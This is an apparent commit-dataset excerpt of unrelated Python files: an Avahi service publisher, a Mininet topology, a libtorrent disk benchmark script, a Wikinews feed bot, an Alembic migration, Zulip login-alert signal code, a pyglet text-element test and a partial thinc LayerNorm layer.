"""
class ServicePublisher (threading.Thread):
def __init__(self, name, type, port, txt = "", domain = "", host = ""):
threading.Thread.__init__(self)
gobject.threads_init()
self._name = name
self._type = type
self._port = port
self._txt = txt
self._domain = ""
self._host = ""
self._group = None
self._rename_count = 12 # Counter so we only rename after collisions a sensible number of times
def run(self):
DBusGMainLoop( set_as_default=True )
self._main_loop = gobject.MainLoop()
self._bus = dbus.SystemBus()
self._server = dbus.Interface(
self._bus.get_object( avahi.DBUS_NAME, avahi.DBUS_PATH_SERVER ),
avahi.DBUS_INTERFACE_SERVER )
self._server.connect_to_signal( "StateChanged", self._server_state_changed )
self._server_state_changed( self._server.GetState() )
self._main_loop.run()
if not self._group is None:
self._group.Free()
def stop(self):
self._main_loop.quit()
def _add_service(self):
if self._group is None:
self._group = dbus.Interface(
self._bus.get_object( avahi.DBUS_NAME, self._server.EntryGroupNew()),
avahi.DBUS_INTERFACE_ENTRY_GROUP)
self._group.connect_to_signal('StateChanged', self._entry_group_state_changed)
print "Adding service '%s' of type '%s' ..." % (self._name, self._type)
self._group.AddService(
avahi.IF_UNSPEC, #interface
avahi.PROTO_UNSPEC, #protocol
0, #flags
self._name, self._type,
self._domain, self._host,
dbus.UInt16(self._port),
avahi.string_array_to_txt_array(self._txt))
self._group.Commit()
def _remove_service(self):
if not self._group is None:
self._group.Reset()
def _server_state_changed(self, state):
if state == avahi.SERVER_COLLISION:
print "WARNING: Server name collision"
self._remove_service()
elif state == avahi.SERVER_RUNNING:
self._add_service()
def _entry_group_state_changed(self, state, error):
print "state change: %i" % state
if state == avahi.ENTRY_GROUP_ESTABLISHED:
print "Service established."
elif state == avahi.ENTRY_GROUP_COLLISION:
self._rename_count = self._rename_count - 1
if rename_count > 0:
name = server.GetAlternativeServiceName(name)
print "WARNING: Service name collision, changing name to '%s' ..." % name
self._remove_service()
self._add_service()
else:
print "ERROR: No suitable service name found after %i retries, exiting." % n_rename
self._main_loop.quit()
elif state == avahi.ENTRY_GROUP_FAILURE:
print "Error in group state changed", error
self._main_loop.quit()
return
if __name__ == "__main__":
sp = ServicePublisher("test","_test._tcp",1234)
sp.start()
chr = sys.stdin.read(1)
sp.stop()
| Python | 0 | |
062b4d045580adaebf30376cae1b88387dc7f3bb | add test_db | www/test_deb.py | www/test_deb.py | # coding=utf-8
from www.models import User
from www.transwarp import db
__author__ = 'xubinggui'
db.create_engine(user='www-data', password='www-data', database='awesome')
u = User(name='Test', email='test@example.com', password='1234567890', image='about:blank')
u.insert()
print 'new user id:', u.id
u1 = User.find_first('where email=?', 'test@example.com')
print 'find user\'s name:', u1.name
u1.delete()
u2 = User.find_first('where email=?', 'test@example.com')
print 'find user:', u2 | Python | 0.000001 | |
64c24ee2813e5d85866d14cfdee8258b91c09df6 | add debug topology file | evaluation/topo-fattree.py | evaluation/topo-fattree.py | """Custom topology example
Two directly connected switches plus a host for each switch:
host --- switch --- switch --- host
Adding the 'topos' dict with a key/value pair to generate our newly defined
topology enables one to pass in '--topo=mytopo' from the command line.
"""
from mininet.topo import Topo
class MyTopo( Topo ):
"Simple topology example."
def __init__( self ):
"Create custom topo."
# Initialize topology
Topo.__init__( self )
# Add hosts and switches
host1 = self.addHost('h1')
host2 = self.addHost('h2')
host3 = self.addHost('h3')
host4 = self.addHost('h4')
host5 = self.addHost('h5')
host6 = self.addHost('h6')
host7 = self.addHost('h7')
host8 = self.addHost('h8')
switch1 = self.addSwitch('s1')
switch2 = self.addSwitch('s2')
switch3 = self.addSwitch('s3')
switch4 = self.addSwitch('s4')
switch5 = self.addSwitch('s5')
switch6 = self.addSwitch('s6')
switch7 = self.addSwitch('s7')
switch8 = self.addSwitch('s8')
switch9 = self.addSwitch('s9')
switch10 = self.addSwitch('s10')
# Add links
self.addLink(host1, switch1)
self.addLink(host2, switch1)
self.addLink(host3, switch2)
self.addLink(host4, switch2)
self.addLink(switch1, switch3)
self.addLink(switch1, switch4)
self.addLink(switch2, switch3)
self.addLink(switch2, switch4)
self.addLink(host5, switch5)
self.addLink(host6, switch5)
self.addLink(host7, switch6)
self.addLink(host8, switch6)
self.addLink(switch5, switch7)
self.addLink(switch5, switch8)
self.addLink(switch6, switch7)
self.addLink(switch6, switch8)
self.addLink(switch3, switch9)
self.addLink(switch3, switch10)
self.addLink(switch4, switch9)
self.addLink(switch4, switch10)
self.addLink(switch7, switch9)
self.addLink(switch7, switch10)
self.addLink(switch8, switch9)
self.addLink(switch8, switch10)
topos = { 'fattree': ( lambda: MyTopo() ) }
| Python | 0.000001 | |
58ed327ce441f41d3e9a2bff60e0c2a428b51192 | add initial disk I/O benchmark script | examples/run_benchmarks.py | examples/run_benchmarks.py | import sys
import os
import resource
import shutil
import shlex
import time
import subprocess
import random
# this is a disk I/O benchmark script. It runs benchmarks
# over different filesystems, different cache sizes and
# different number of peers (can be used to find a reasonable
# range for unchoke slots).
# it also measures performance improvements of re-ordering
# read requests based on physical location and OS hints
# like posix_fadvise(FADV_WILLNEED). It can also be used
# for the AIO branch to measure improvements over the
# classic thread based disk I/O
# to set up the test, build the example directory in release
# with statistics=on and copy fragmentation_test, client_test
# and connection_tester to the current directory.
# make sure gnuplot is installed.
# the following lists define the space tests will be run in
# variables to test. All these are run on the first
# entry in the filesystem list.
# NOTE: this script is Python 2 (print statements, ``print >>f`` below).
# cache sizes to sweep; passed to client_test via -C (units per client_test's
# -C flag -- presumably 16 KiB blocks, TODO confirm against client_test docs)
cache_sizes = [0, 256, 512, 1024, 2048, 4096, 8192]
# peer counts to sweep; passed to client_test / connection_tester
peers = [10, 100, 500, 1000, 2000]
# the drives are assumed to be mounted under ./<name>
# or have symbolic links to them.
filesystem = ['ext4', 'ext3', 'reiser', 'xfs']
# the number of peers for the filesystem test. The
# idea is to stress test the filesystem by using a lot
# of peers, since each peer essentially is a separate
# read location on the platter
filesystem_peers = 1000
# the amount of cache for the filesystem test
filesystem_cache = 8192
# the number of seconds to run each test. It's important that
# this is shorter than what it takes to finish downloading
# the test torrent, since then the average rate will not
# be representative of the peak anymore
test_duration = 400
# make sure the environment is properly set up
# (each simulated peer needs its own file descriptor)
if resource.getrlimit(resource.RLIMIT_NOFILE)[0] < 4000:
print 'please set ulimit -n to at least 4000'
sys.exit(1)
# make sure we have all the binaries available
binaries = ['client_test', 'connection_tester', 'fragmentation_test']
for i in binaries:
if not os.path.exists(i):
print 'make sure "%s" is available in current working directory' % i
sys.exit(1)
# every entry in `filesystem` must exist as a directory/mountpoint
for i in filesystem:
if not os.path.exists(i):
print ('the path "%s" does not exist. This is directory/mountpoint is ' +
'used as the download directory and is the filesystem that will be benchmarked ' +
'and need to exist.') % i
sys.exit(1)
# make sure we have a test torrent
if not os.path.exists('test.torrent'):
print 'generating test torrent'
os.system('./connection_tester gen-torrent test.torrent')
# use a new port for each test to make sure they keep working
# this port is incremented for each test run
port = 10000 + random.randint(0, 5000)
def build_commandline(config, port, duration=None):
    """Build the client_test command line for one benchmark run.

    config   -- dict produced by build_test_config()
    port     -- listen port for this run
    duration -- seconds to run (-q); defaults to the module-level
                ``test_duration`` for backward compatibility

    Returns the full shell command as a string.
    """
    if duration is None:
        # preserve the historical behaviour of reading the module global
        duration = test_duration
    num_peers = config['num-peers']
    # boolean config entries translate into client_test switches:
    # -O disables disk reordering, -j disables read-ahead
    no_disk_reorder = '-O' if config['allow-disk-reorder'] == False else ''
    no_read_ahead = '-j' if config['read-ahead'] == False else ''
    return './client_test -k -z -N -h -H -M -S %d -T %d -c %d -C %d -s "%s" %s %s -q %d -p %d -l session_stats/alerts_log.txt test.torrent' \
        % (num_peers, num_peers, num_peers, config['cache-size'], config['save-path'],
           no_disk_reorder, no_read_ahead, duration, port)
def delete_files(files):
    """Best-effort removal of the given paths.

    Each entry is first removed as a file; if that fails it is removed
    as a directory tree.  All errors are deliberately ignored so stale
    state never aborts a benchmark run.
    """
    for path in files:
        try:
            os.remove(path)
            continue
        except:
            pass
        try:
            shutil.rmtree(path)
        except:
            pass
def build_test_config(fs, num_peers, cache_size, readahead=True, reorder=True):
    """Assemble the settings dict describing one benchmark run."""
    config = {'test': 'dual'}
    config['save-path'] = os.path.join('./', fs)
    config['num-peers'] = num_peers
    config['allow-disk-reorder'] = reorder
    config['cache-size'] = cache_size
    config['read-ahead'] = readahead
    return config
def build_target_folder(config):
    """Name of the directory that will hold this run's results."""
    reorder = 'no-reorder' if config['allow-disk-reorder'] == False else 'reorder'
    readahead = 'no-readahead' if config['read-ahead'] == False else 'readahead'
    # last path component of the save path names the filesystem under test
    fs_name = os.path.split(config['save-path'])[1]
    return 'results_%d_%d_%s_%s_%s_%s' % (
        config['num-peers'], config['cache-size'], fs_name,
        config['test'], reorder, readahead)
def run_test(config):
# Run one benchmark configuration end-to-end: launch client_test, drive it
# with connection_tester, collect fragmentation + session stats, then move
# everything into a per-config results directory and bump the port.
if os.path.exists(build_target_folder(config)):
print 'results already exists, skipping test'
return
# make sure any previous test file is removed
delete_files([os.path.join(config['save-path'], 'stress_test_file'), '.ses_state', '.resume', '.dht_state', 'session_stats'])
try: os.mkdir('session_stats')
except: pass
# save off the command line for reference
global port
cmdline = build_commandline(config, port)
f = open('session_stats/cmdline.txt', 'w+')
f.write(cmdline)
f.close()
f = open('session_stats/config.txt', 'w+')
print >>f, config
f.close()
# client output is captured to a file; the handle is passed to Popen below
f = open('session_stats/client.output', 'w+')
print 'launching: %s' % cmdline
client = subprocess.Popen(shlex.split(cmdline), stdout=f)
# give the client a moment to start listening before the tester connects
time.sleep(1)
print '\n\n*********************************'
print '* RUNNING TEST *'
print '*********************************\n\n'
print 'launching connection tester'
# blocks until the tester finishes (client_test exits on its own after -q
# seconds). NOTE(review): `client` is never wait()ed or terminated here --
# presumably it has exited by the time the tester returns; confirm.
os.system('./connection_tester %s %d 127.0.0.1 %d test.torrent >session_stats/tester.output' % (config['test'], config['num-peers'], port))
f.close()
# run fragmentation test
print 'analyzing fragmentation'
os.system('./fragmentation_test test.torrent %s' % config['save-path'])
shutil.copy('fragmentation.log', 'session_stats/')
shutil.copy('fragmentation.png', 'session_stats/')
shutil.copy('fragmentation.gnuplot', 'session_stats/')
os.chdir('session_stats')
# parse session stats
print 'parsing session log'
os.system('python ../../parse_session_stats.py *.0000.log')
os.chdir('..')
# move the results into its final place
print 'saving results'
os.rename('session_stats', build_target_folder(config))
# clean up
print 'cleaning up'
delete_files([os.path.join(config['save-path'], 'stress_test_file'), '.ses_state', '.resume', '.dht_state'])
# use a fresh port for the next run so TIME_WAIT sockets don't interfere
port += 1
# Drive the benchmark matrix: one run per filesystem, plus a sweep over
# cache sizes, peer counts, read-ahead and reorder settings.
# NOTE(review): the inner sweep passes filesystem_peers/filesystem_cache
# instead of the loop variables `p` and `c`, so `c` and `p` are unused --
# looks like a bug (or the sweep was intentionally reduced); confirm intent.
for fs in filesystem:
config = build_test_config(fs, filesystem_peers, filesystem_cache)
run_test(config)
for c in cache_sizes:
for p in peers:
for rdahead in [True, False]:
for reorder in [True, False]:
config = build_test_config(fs, filesystem_peers, filesystem_cache, rdahead, reorder)
run_test(config)
| Python | 0.000004 | |
b3a16addda494428a69b80fe7d32b07520e1d292 | Create wikinews-updater.py | wikinews-updater.py | wikinews-updater.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import requests
import login
# MediaWiki API endpoints: Russian Wikinews is the read side, Russian
# Wikipedia is the write side.
wn_API = "https://ru.wikinews.org/w/api.php"
wp_API = "https://ru.wikipedia.org/w/api.php"
# descriptive User-Agent for API requests, per Wikimedia bot policy
ua = {"User-agent": "pyBot/latestnews (toolforge/iluvatarbot; iluvatar@tools.wmflabs.org) requests (python3)"}
# log in once via the project-local helper; presumably returns a CSRF edit
# token plus session cookies -- TODO confirm against login.py
token, cookies = login.login(server="ru.wikipedia")
# One task per target landing page: copy the newest published Wikinews
# articles of `category` onto `landing` on Wikipedia, at most `count` items.
tasks = [
{"category": "Бизнес", "landing": "Проект:Компании/Викиновости/Бизнес", "count": 20},
{"category": "Екатеринбург", "landing": "Портал:Екатеринбург/Викиновости", "count": 7},
{"category": "Казань", "landing": "Портал:Казань/Викиновости", "count": 7},
{"category": "Музыка", "landing": "Портал:Музыка/Викиновости", "count": 10},
{"category": "ООН", "landing": "Портал:Организация Объединённых Наций/Викиновости", "count": 10},
{"category": "Республика Татарстан", "landing": "Портал:Татарстан/Викиновости", "count": 7},
{"category": "Санкт-Петербург", "landing": "Портал:Санкт-Петербург/Викиновости", "count": 10},
{"category": "Свердловская область", "landing": "Портал:Свердловская область/Викиновости", "count": 7},
{"category": "Урал", "landing": "Портал:Урал/Викиновости", "count": 7},
{"category": "Футбол", "landing": "Портал:Футбол/Викиновости", "count": 10},
{"category": "Хоккей с шайбой", "landing": "Портал:Хоккей/Викиновости/Хоккей с шайбой", "count": 10},
{"category": "Экономика", "landing": "Портал:Экономика/Викиновости", "count": 15}
]
def handler(members, task):
# Build a wiki list of up to task["count"] published articles from
# `members` and write it to the task's landing page on Wikipedia.
# Pages that fail the check() (not yet published) are skipped.
news = []
i = 0
for member in members:
if check(member["title"]):
i += 1
# each entry renders via the {{news}} template on the landing page
news.append("* {{news|" + str(member["title"]) + "}}")
if i >= task["count"]:
break
# only edit when at least one published article was found
if len(news) > 0:
params = {
"action": "edit", "format": "json", "utf8": "1", "title": str(task["landing"]), "nocreate": 1,
"text": "\n".join(news), "summary": "Обновление ленты новостей", "token": token
}
requests.post(url=wp_API, data=params, cookies=cookies)
def check(page):
    """Return True if the Wikinews page transcludes the 'publish' template.

    Queries the Wikinews API for templates used on *page*, restricted to
    the template namespace and the specific publication-marker template.
    """
    params = {
        "action": "query", "format": "json", "utf8": "1", "prop": "templates", "titles": page, "tlnamespace": 10,
        "tllimit": 500, "tltemplates": "Шаблон:Публиковать"
    }
    pages = requests.post(url=wn_API, data=params, headers=ua).json()["query"]["pages"]
    if pages:
        # the response dict is keyed by page id; there is exactly one entry
        first = next(iter(pages))
        if "templates" in pages[first] and len(pages[first]["templates"]) > 0:
            return True
    return False
def getData(task):
    """Fetch the newest category members for *task* from Wikinews and
    hand them to handler().

    Network/parse errors are retried every 30 seconds until one attempt
    succeeds.
    """
    params = {
        "action": "query", "format": "json", "utf8": "1", "list": "categorymembers",
        "cmtitle": "Категория:" + str(task["category"]), "cmprop": "timestamp|ids|title", "cmnamespace": 0,
        "cmtype": "page", "cmlimit": 500, "cmsort": "timestamp", "cmdir": "older"
    }
    while True:
        try:
            res = requests.post(url=wn_API, data=params, headers=ua).json()["query"]["categorymembers"]
        except Exception:
            # Bug fix: the retry used to call getData() with no argument,
            # which raised TypeError instead of retrying.  Retrying in a
            # loop also avoids unbounded recursion on a persistent outage,
            # and `except Exception` no longer swallows KeyboardInterrupt.
            time.sleep(30)
        else:
            handler(res, task)
            return


# process every configured task once per invocation
for task in tasks:
    getData(task)
| Python | 0 | |
d0474ea69c9bcc5b07829603778e0277d1fd733a | fix moved Glottolog identifier of nepa1252 | migrations/versions/1715ee79365_fix_missing_nepa1252_identifier.py | migrations/versions/1715ee79365_fix_missing_nepa1252_identifier.py | # coding=utf-8
"""fix missing nepa1252 identifier
Revision ID: 1715ee79365
Revises: 506dcac7d75
Create Date: 2015-04-15 19:34:27.655000
"""
# revision identifiers, used by Alembic.
revision = '1715ee79365'
down_revision = '506dcac7d75'
import datetime
from alembic import op
import sqlalchemy as sa
def upgrade():
# Attach the Glottolog identifier 'Nepali' to language nepa1252.
# Both INSERTs use INSERT ... SELECT ... WHERE NOT EXISTS so the
# migration is idempotent (safe to re-run).
# NOTE(review): `id` and `name` shadow the builtins of the same name --
# harmless here, but worth renaming if this code is ever extended.
id, name = 'nepa1252', 'Nepali'
# create the identifier row itself, unless it already exists
insert_ident = sa.text('INSERT INTO identifier '
'(created, updated, active, version, type, description, lang, name) '
'SELECT now(), now(), true, 1, :type, :description, :lang, :name '
'WHERE NOT EXISTS (SELECT 1 FROM identifier WHERE type = :type '
'AND description = :description AND lang = :lang AND name = :name)'
).bindparams(type='name', description='Glottolog', lang='en')
# link the language to the identifier, unless the link already exists
insert_lang_ident = sa.text('INSERT INTO languageidentifier '
'(created, updated, active, version, language_pk, identifier_pk) '
'SELECT now(), now(), true, 1, '
'(SELECT pk FROM language WHERE id = :id), '
'(SELECT pk FROM identifier WHERE type = :type '
'AND description = :description AND lang = :lang AND name = :name) '
'WHERE NOT EXISTS (SELECT 1 FROM languageidentifier '
'WHERE language_pk = (SELECT pk FROM language WHERE id = :id) '
'AND identifier_pk = (SELECT pk FROM identifier WHERE type = :type '
'AND description = :description AND lang = :lang AND name = :name))'
).bindparams(type='name', description='Glottolog', lang='en')
op.execute(insert_ident.bindparams(name=name))
op.execute(insert_lang_ident.bindparams(id=id, name=name))
def downgrade():
# intentionally a no-op: removing the identifier again is not supported
pass
| Python | 0 | |
18e66983c49c68e9000acd331d6888c4c72a99b3 | Fix mypy error. | zerver/signals.py | zerver/signals.py | from __future__ import absolute_import
from django.dispatch import receiver
from django.contrib.auth.signals import user_logged_in
from django.core.mail import send_mail
from django.conf import settings
from django.template import loader
from django.utils import timezone
from typing import Any, Dict, Optional
from zerver.models import UserProfile
def get_device_browser(user_agent):
    # type: (str) -> Optional[str]
    """Best-effort browser name parsed from a User-Agent string, or None."""
    ua = user_agent.lower()
    # Ordered rules: (label, tokens of which any must appear, tokens that
    # must not appear).  Order matters: e.g. Chrome UAs also contain
    # "safari", so Chrome is tested first.
    rules = (
        ('Chrome', ('chrome',), ('chromium',)),
        ('Firefox', ('firefox',), ('seamonkey', 'chrome')),
        ('Chromium', ('chromium',), ()),
        ('Safari', ('safari',), ('chrome', 'chromium')),
        ('Opera', ('opera',), ()),
        ('Internet Explorer', ('msie', 'trident'), ()),
        ('Edge', ('edge',), ()),
    )
    for label, wanted, unwanted in rules:
        if any(tok in ua for tok in wanted) and not any(tok in ua for tok in unwanted):
            return label
    return None
def get_device_os(user_agent):
    # type: (str) -> Optional[str]
    """Best-effort operating system parsed from a User-Agent string, or None."""
    ua = user_agent.lower()
    # Ordered checks; Linux must exclude Android since Android UAs
    # also contain "linux".
    checks = (
        ("Windows", lambda s: "windows" in s),
        ("MacOS", lambda s: "macintosh" in s),
        ("Linux", lambda s: "linux" in s and "android" not in s),
        ("Android", lambda s: "android" in s),
        ("iOS", lambda s: "like mac os x" in s),
    )
    for label, matches in checks:
        if matches(ua):
            return label
    return None
@receiver(user_logged_in, dispatch_uid="only_on_login")
def email_on_new_login(sender, user, request, **kwargs):
    # type: (Any, UserProfile, Any, Any) -> None
    """Send the user a 'new login' alert email when they sign in.

    Skipped entirely when settings.SEND_LOGIN_EMAILS is off, and for
    logins that are part of a brand-new registration (POST to
    /accounts/register/).
    """
    # We import here to minimize the dependencies of this module,
    # since it runs as part of `manage.py` initialization
    from zerver.context_processors import common_context

    if not settings.SEND_LOGIN_EMAILS:
        return

    if request:
        # Login emails are for returning users, not new registrations.
        # Determine if login request was from new registration.
        path = request.META.get('PATH_INFO', None)
        if path:
            if path == "/accounts/register/":
                return

        login_time = timezone.now().strftime('%A, %B %d, %Y at %I:%M%p ') + \
            timezone.get_current_timezone_name()
        user_agent = request.META.get('HTTP_USER_AGENT', "").lower()

        device_browser = get_device_browser(user_agent)
        device_os = get_device_os(user_agent)
        # Fixed typo: the fallback string used to read "Uknown IP address".
        device_ip = request.META.get('REMOTE_ADDR') or "Unknown IP address"
        device_info = {"device_browser": device_browser,
                       "device_os": device_os,
                       "device_ip": device_ip,
                       "login_time": login_time
                       }

        context = common_context(user)
        context['device_info'] = device_info
        context['zulip_support'] = settings.ZULIP_ADMINISTRATOR
        context['user'] = user

        text_template = 'zerver/emails/new_login/new_login_alert.txt'
        html_template = 'zerver/emails/new_login/new_login_alert.html'
        text_content = loader.render_to_string(text_template, context)
        html_content = loader.render_to_string(html_template, context)

        sender = settings.NOREPLY_EMAIL_ADDRESS
        recipients = [user.email]
        subject = loader.render_to_string('zerver/emails/new_login/new_login_alert.subject').strip()
        send_mail(subject, text_content, sender, recipients, html_message=html_content)
| from __future__ import absolute_import
from django.dispatch import receiver
from django.contrib.auth.signals import user_logged_in
from django.core.mail import send_mail
from django.conf import settings
from django.template import loader
from django.utils import timezone
from typing import Any, Dict, Optional
def get_device_browser(user_agent):
    # type: (str) -> Optional[str]
    """Best-effort browser name parsed from a User-Agent string, or None."""
    ua = user_agent.lower()
    # Ordered rules: (label, tokens of which any must appear, tokens that
    # must not appear).  Order matters: e.g. Chrome UAs also contain
    # "safari", so Chrome is tested first.
    rules = (
        ('Chrome', ('chrome',), ('chromium',)),
        ('Firefox', ('firefox',), ('seamonkey', 'chrome')),
        ('Chromium', ('chromium',), ()),
        ('Safari', ('safari',), ('chrome', 'chromium')),
        ('Opera', ('opera',), ()),
        ('Internet Explorer', ('msie', 'trident'), ()),
        ('Edge', ('edge',), ()),
    )
    for label, wanted, unwanted in rules:
        if any(tok in ua for tok in wanted) and not any(tok in ua for tok in unwanted):
            return label
    return None
def get_device_os(user_agent):
    # type: (str) -> Optional[str]
    """Best-effort operating system parsed from a User-Agent string, or None."""
    ua = user_agent.lower()
    # Ordered checks; Linux must exclude Android since Android UAs
    # also contain "linux".
    checks = (
        ("Windows", lambda s: "windows" in s),
        ("MacOS", lambda s: "macintosh" in s),
        ("Linux", lambda s: "linux" in s and "android" not in s),
        ("Android", lambda s: "android" in s),
        ("iOS", lambda s: "like mac os x" in s),
    )
    for label, matches in checks:
        if matches(ua):
            return label
    return None
@receiver(user_logged_in, dispatch_uid="only_on_login")
def email_on_new_login(sender, user, request, **kwargs):
# type: (Any, UserProfile, Any, Any) -> None
# Send the user a 'new login' alert email when they sign in; skipped when
# SEND_LOGIN_EMAILS is off and for logins that are part of registration.
# We import here to minimize the dependencies of this module,
# since it runs as part of `manage.py` initialization
from zerver.context_processors import common_context
# NOTE(review): UserProfile is imported only so the `# type:` comment
# resolves; importing it locally breaks mypy's view of the annotation.
from zerver.models import UserProfile
if not settings.SEND_LOGIN_EMAILS:
return
if request:
# Login emails are for returning users, not new registrations.
# Determine if login request was from new registration.
path = request.META.get('PATH_INFO', None)
if path:
if path == "/accounts/register/":
return
login_time = timezone.now().strftime('%A, %B %d, %Y at %I:%M%p ') + \
timezone.get_current_timezone_name()
user_agent = request.META.get('HTTP_USER_AGENT', "").lower()
device_browser = get_device_browser(user_agent)
device_os = get_device_os(user_agent)
# NOTE(review): "Uknown" is a typo for "Unknown" in this fallback string.
device_ip = request.META.get('REMOTE_ADDR') or "Uknown IP address"
device_info = {"device_browser": device_browser,
"device_os": device_os,
"device_ip": device_ip,
"login_time": login_time
}
context = common_context(user)
context['device_info'] = device_info
context['zulip_support'] = settings.ZULIP_ADMINISTRATOR
context['user'] = user
text_template = 'zerver/emails/new_login/new_login_alert.txt'
html_template = 'zerver/emails/new_login/new_login_alert.html'
text_content = loader.render_to_string(text_template, context)
html_content = loader.render_to_string(html_template, context)
sender = settings.NOREPLY_EMAIL_ADDRESS
recipients = [user.email]
subject = loader.render_to_string('zerver/emails/new_login/new_login_alert.subject').strip()
send_mail(subject, text_content, sender, recipients, html_message=html_content)
| Python | 0 |
2749b4b754562c45a54b3df108c5c40c8d548038 | Create __init__.py | web/__init__.py | web/__init__.py | Python | 0.000429 | ||
1396ff4ab4e6664c265f97958951815a525f7823 | Remove confusing navigation tabs from header. | reddit_donate/pages.py | reddit_donate/pages.py | from r2.lib.pages import Reddit
from r2.lib.wrapped import Templated
class DonatePage(Reddit):
# Base page for the donate app: a standard Reddit page without the
# sidebar, plus the donate stylesheet.
extra_stylesheets = Reddit.extra_stylesheets + ["donate.less"]
def __init__(self, title, content, **kwargs):
Reddit.__init__(
self,
title=title,
content=content,
show_sidebar=False,
**kwargs
)
def build_toolbars(self):
# get rid of tabs on the top (Reddit's default navigation is
# irrelevant on donate pages)
return []
class DonateLanding(Templated):
# Template-only landing page content; all markup lives in the
# corresponding .html template.
pass
| from r2.lib.pages import Reddit
from r2.lib.wrapped import Templated
class DonatePage(Reddit):
# Base page for the donate app: a standard Reddit page without the
# sidebar, plus the donate stylesheet.
extra_stylesheets = Reddit.extra_stylesheets + ["donate.less"]
def __init__(self, title, content, **kwargs):
Reddit.__init__(
self,
title=title,
content=content,
show_sidebar=False,
**kwargs
)
class DonateLanding(Templated):
# Template-only landing page content; all markup lives in the
# corresponding .html template.
pass
| Python | 0 |
307feb3f32fa31faa5754616a1e78c9ad03b0483 | test to demonstrate bug 538 | tests/text/ELEMENT_CHANGE_STYLE.py | tests/text/ELEMENT_CHANGE_STYLE.py | #!/usr/bin/env python
'''Test that inline elements can have their style changed, even after text
has been deleted before them. [This triggers bug 538 if it has not yet been fixed.]
To run the test, delete the first line, one character at a time,
verifying that the element remains visible and no tracebacks are
printed to the console.
Press ESC to end the test.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import unittest
import pyglet
from pyglet.text import caret, document, layout
doctext = '''ELEMENT.py test document.
PLACE CURSOR AT THE END OF THE ABOVE LINE, AND DELETE ALL ITS TEXT,
BY PRESSING THE DELETE KEY REPEATEDLY.
IF THIS WORKS OK, AND THE ELEMENT (GRAY RECTANGLE) WITHIN THIS LINE
[element here]
REMAINS VISIBLE BETWEEN THE SAME CHARACTERS, WITH NO ASSERTIONS PRINTED TO
THE CONSOLE, THE TEST PASSES.
(In code with bug 538, the element sometimes moves within the text, and
eventually there is an assertion failure. Note that there is another bug,
unrelated to this one, which sometimes causes the first press of the delete
key to be ignored.)
Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Fusce venenatis
pharetra libero. Phasellus lacinia nisi feugiat felis. Sed id magna in nisl
cursus consectetuer. Aliquam aliquam lectus eu magna. Praesent sit amet ipsum
vitae nisl mattis commodo. Aenean pulvinar facilisis lectus. Phasellus sodales
risus sit amet lectus. Suspendisse in turpis. Vestibulum ac mi accumsan eros
commodo tincidunt. Nullam velit. In pulvinar, dui sit amet ullamcorper dictum,
dui risus ultricies nisl, a dignissim sapien enim sit amet tortor.
Pellentesque fringilla, massa sit amet bibendum blandit, pede leo commodo mi,
eleifend feugiat neque tortor dapibus mauris. Morbi nunc arcu, tincidunt vel,
blandit non, iaculis vel, libero. Vestibulum sed metus vel velit scelerisque
varius. Vivamus a tellus. Proin nec orci vel elit molestie venenatis. Aenean
fringilla, lorem vel fringilla bibendum, nibh mi varius mi, eget semper ipsum
ligula ut urna. Nullam tempor convallis augue. Sed at dui.
'''
element_index = doctext.index('[element here]')
doctext = doctext.replace('[element here]', '')
class TestElement(document.InlineElement):
# Inline element rendered as a flat gray rectangle; used to verify the
# element keeps its position while text before it is deleted (bug 538).
vertex_list = None
def place(self, layout, x, y):
# Called by the layout when the element becomes visible.
## assert layout.document.text[self._position] == '\x00'
### in bug 538, this fails after two characters are deleted.
self.vertex_list = layout.batch.add(4, pyglet.gl.GL_QUADS,
layout.top_group,
'v2i',
('c4B', [200, 200, 200, 255] * 4))
# rectangle spans the element's advance horizontally and its
# ascent/descent vertically
y += self.descent
w = self.advance
h = self.ascent - self.descent
self.vertex_list.vertices[:] = (x, y,
x + w, y,
x + w, y + h,
x, y + h)
def remove(self, layout):
# Called when the element is scrolled out / deleted; free the quad.
self.vertex_list.delete()
del self.vertex_list
class TestWindow(pyglet.window.Window):
# Editable text window with one TestElement inserted at element_index.
def __init__(self, *args, **kwargs):
super(TestWindow, self).__init__(*args, **kwargs)
self.batch = pyglet.graphics.Batch()
self.document = pyglet.text.decode_attributed(doctext)
for i in [element_index]:
self.document.insert_element(i, TestElement(60, -10, 70))
self.margin = 2
self.layout = layout.IncrementalTextLayout(self.document,
self.width - self.margin * 2, self.height - self.margin * 2,
multiline=True,
batch=self.batch)
self.caret = caret.Caret(self.layout)
self.push_handlers(self.caret)
self.set_mouse_cursor(self.get_system_mouse_cursor('text'))
def on_draw(self):
# white background, then the whole batch (text + element quad)
pyglet.gl.glClearColor(1, 1, 1, 1)
self.clear()
self.batch.draw()
def on_key_press(self, symbol, modifiers):
super(TestWindow, self).on_key_press(symbol, modifiers)
if symbol == pyglet.window.key.TAB:
self.caret.on_text('\t')
# restyling the whole document after every key press is what
# exercises the inline-element position bug
self.document.set_style(0, len(self.document.text), dict(bold = None)) ### trigger bug 538
class TestCase(unittest.TestCase):
# Interactive test: opens the window and runs the pyglet event loop
# until the user closes it (press ESC); pass/fail is judged visually.
def test(self):
self.window = TestWindow(##resizable=True,
visible=False)
self.window.set_visible()
pyglet.app.run()
if __name__ == '__main__':
unittest.main()
| Python | 0 | |
3df697b29931025a9c6f3f809eda2260d4211305 | Add LayerNorm class | thinc/neural/_classes/layernorm.py | thinc/neural/_classes/layernorm.py | from ... import describe
from .model import Model
def _init_to_one(W, ops):
W.fill(1.)
def _run_child_hooks(model, X, y=None):
for hook in model.child.on_data_hooks:
hook(model.child, X, y)
model.nO = model.child.nO
@describe.on_data(_run_child_hooks)
@describe.attributes(
G=describe.Weights("Scaling vector",
lambda obj: (obj.nO,), _init_to_one),
b=describe.Biases("Bias vector",
lambda obj: (obj.nO,)),
d_G=describe.Gradient("G"),
d_b=describe.Gradient("b")
)
class LayerNorm(Model):
# Layer normalization wrapper: normalizes the child layer's output per
# row (mean 0, variance 1), then applies a learned scale G and bias b.
name = 'layernorm'
def __init__(self, child, **kwargs):
self.child = child
self._layers = [child]
# output width comes from an explicit nO kwarg, else from the child
if 'nO' in kwargs:
self.nO = kwargs['nO']
elif getattr(child, 'nO', None):
self.nO = child.nO
self.nr_upd = 0
Model.__init__(self, **kwargs)
def predict(self, X):
# forward pass only: child -> normalize -> scale & shift
X = self.child.predict(X)
N, mu, var = _get_moments(self.ops, X)
Xh = _forward(self.ops, X, mu, var)
y = Xh * self.G + self.b
return y
